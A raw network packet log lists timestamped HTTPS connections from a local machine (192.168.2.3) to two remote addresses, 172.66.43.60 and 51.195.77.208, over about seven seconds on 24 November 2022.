Nov 24, 2022 12:20:59.087974072 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.088016033 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.137799025 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.138044119 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.449182034 CET	49787	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.449244976 CET	443	49787	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.449359894 CET	49787	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.452624083 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.452702999 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.453159094 CET	49787	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.453192949 CET	443	49787	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.453269005 CET	443	49787	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.453352928 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.453578949 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.482060909 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.482084990 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.552642107 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.552753925 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.552927017 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.591422081 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.591458082 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.727060080 CET	49788	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.727127075 CET	443	49788	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.727242947 CET	49788	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.728240967 CET	49788	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:59.728271008 CET	443	49788	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.728355885 CET	443	49788	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:00.226742029 CET	49789	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:00.226808071 CET	443	49789	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:00.226973057 CET	49789	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:00.228017092 CET	49789	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:00.228046894 CET	443	49789	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:00.228116989 CET	443	49789	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:00.932358980 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:00.932411909 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:00.932501078 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:00.950576067 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:00.950618029 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:00.993537903 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:00.993767023 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.115340948 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.115371943 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:01.119581938 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.119609118 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:01.127383947 CET	49791	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:01.127429962 CET	443	49791	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:01.127505064 CET	49791	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:01.127839088 CET	49791	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:01.127851963 CET	443	49791	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:01.127922058 CET	443	49791	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:01.190114975 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:01.190273046 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.190314054 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:01.190376997 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.360974073 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:01.361125946 CET	443	49790	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:01.361205101 CET	49790	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.276372910 CET	49792	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.276422024 CET	443	49792	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.276897907 CET	49792	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.276897907 CET	49792	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.276949883 CET	443	49792	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.277224064 CET	443	49792	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.535268068 CET	49793	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.535324097 CET	443	49793	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.535480022 CET	49793	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.536017895 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.536068916 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.536470890 CET	49793	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.536475897 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.536493063 CET	443	49793	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.536575079 CET	443	49793	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.542238951 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.542295933 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.596354961 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.596940994 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.646919012 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.646984100 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.647639036 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.648175955 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.650258064 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.650285959 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.717494011 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.717588902 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.717649937 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.717649937 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.724579096 CET	49794	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:02.724618912 CET	443	49794	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:02.836189032 CET	49795	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.836241007 CET	443	49795	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.836338043 CET	49795	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.836735010 CET	49795	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:02.836755991 CET	443	49795	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:02.836811066 CET	443	49795	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.015968084 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.016063929 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.016166925 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.019685030 CET	49797	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.019768953 CET	443	49797	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.019856930 CET	49797	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.020241976 CET	49797	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.020272017 CET	443	49797	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.020354033 CET	443	49797	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.127208948 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.127259970 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.174520016 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.174634933 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.207429886 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.207458973 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.211896896 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.211920023 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.282903910 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.282979965 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.283000946 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.283046007 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.288989067 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.289128065 CET	443	49796	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.289195061 CET	49796	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.324594975 CET	49798	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.324650049 CET	443	49798	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.324731112 CET	49798	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.325272083 CET	49798	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.325289965 CET	443	49798	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.325366974 CET	443	49798	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.419974089 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.420042992 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.420126915 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.427093029 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.427134037 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.473972082 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.474077940 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.485954046 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.486006975 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.486727953 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.486836910 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.487572908 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.487600088 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.515014887 CET	49800	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.515064955 CET	443	49800	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.515191078 CET	49800	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.515511990 CET	49800	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.515532970 CET	443	49800	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.515578985 CET	443	49800	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.582572937 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.582648993 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.582648993 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.582704067 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.582962036 CET	49799	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.582984924 CET	443	49799	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.657923937 CET	49801	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.658010960 CET	443	49801	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.658122063 CET	49801	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.658555984 CET	49801	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.658587933 CET	443	49801	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.658668995 CET	443	49801	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.691103935 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.691155910 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.691246986 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.691839933 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.691863060 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.739559889 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.739777088 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.755074024 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.755095005 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.770164013 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.770212889 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.779639006 CET	49803	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.779705048 CET	443	49803	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.779804945 CET	49803	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.780291080 CET	49803	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.780313969 CET	443	49803	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.780384064 CET	443	49803	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.855952024 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.856074095 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.856136084 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.856290102 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.861421108 CET	49802	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.861459017 CET	443	49802	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.910471916 CET	49804	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.910536051 CET	443	49804	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.910665035 CET	49804	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.911211014 CET	49804	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:03.911233902 CET	443	49804	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.911273956 CET	443	49804	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:03.989177942 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:03.989238024 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:03.989324093 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.005203962 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.005259037 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.057703972 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.064409971 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.104309082 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.104343891 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.108877897 CET	49806	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.108959913 CET	443	49806	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.109036922 CET	49806	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.109443903 CET	49806	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.109468937 CET	443	49806	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.109519958 CET	443	49806	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.113159895 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.113188982 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.234438896 CET	49807	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.234481096 CET	443	49807	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.234580040 CET	49807	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.234927893 CET	49807	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.234944105 CET	443	49807	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.234987020 CET	443	49807	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.301136971 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.301274061 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.301381111 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.321583986 CET	49805	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.321616888 CET	443	49805	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.437315941 CET	49808	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.437383890 CET	443	49808	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.438922882 CET	49808	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.438922882 CET	49808	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.438994884 CET	443	49808	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.439163923 CET	443	49808	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.467474937 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.467545986 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.467642069 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.470093966 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.470129967 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.518106937 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.520807981 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.533175945 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.533202887 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.541776896 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.541798115 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.636995077 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.637079954 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.637245893 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.638993025 CET	49809	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.639035940 CET	443	49809	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.666138887 CET	49810	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.666187048 CET	443	49810	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.666269064 CET	49810	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.666698933 CET	49810	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.666717052 CET	443	49810	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.666790009 CET	443	49810	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.755814075 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.755863905 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.756169081 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.757194996 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.757229090 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.822870016 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.824481010 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.850713015 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.850739956 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.854917049 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.854944944 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.858509064 CET	49812	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.858555079 CET	443	49812	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.858623981 CET	49812	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.859035015 CET	49812	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:04.859046936 CET	443	49812	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.859100103 CET	443	49812	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:04.997260094 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.998121977 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:04.998166084 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:04.999654055 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.008083105 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.008217096 CET	443	49811	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.008337021 CET	49811	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.014040947 CET	49813	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.014111042 CET	443	49813	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.014214993 CET	49813	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.014776945 CET	49813	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.014811993 CET	443	49813	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.014868021 CET	443	49813	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.143985987 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.144059896 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.144407034 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.158561945 CET	49815	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.158620119 CET	443	49815	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.158917904 CET	49815	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.159329891 CET	49815	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.159353018 CET	443	49815	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.159404993 CET	443	49815	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.187990904 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.188030958 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.241352081 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.241606951 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.296483994 CET	49816	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.296547890 CET	443	49816	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.296631098 CET	49816	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.297740936 CET	49816	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.297760010 CET	443	49816	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.297836065 CET	443	49816	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.391115904 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.391160011 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.391566992 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.391650915 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.392518997 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.392549992 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.502897024 CET	49817	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.502981901 CET	443	49817	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.503156900 CET	49817	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.506249905 CET	49817	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.506275892 CET	443	49817	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.506992102 CET	443	49817	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.812284946 CET	49818	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.812335014 CET	443	49818	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.812437057 CET	49818	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.812796116 CET	49818	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:05.812809944 CET	443	49818	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.812860966 CET	443	49818	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:05.821521997 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.821588039 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.821595907 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.821640015 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.824809074 CET	49814	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.824843884 CET	443	49814	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.979624033 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.979669094 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:05.979790926 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.980468035 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:05.980480909 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.027940989 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.028008938 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.028762102 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.028770924 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.034310102 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.034322977 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.037204027 CET	49820	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.037257910 CET	443	49820	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.037344933 CET	49820	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.043747902 CET	49820	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.043770075 CET	443	49820	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.043839931 CET	443	49820	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.151031971 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.151114941 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.151130915 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.151149988 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.151185989 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.151211977 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.154139996 CET	49819	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.154160976 CET	443	49819	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.300177097 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.300240040 CET	443	49821	172.66.43.60	192.168.2.3
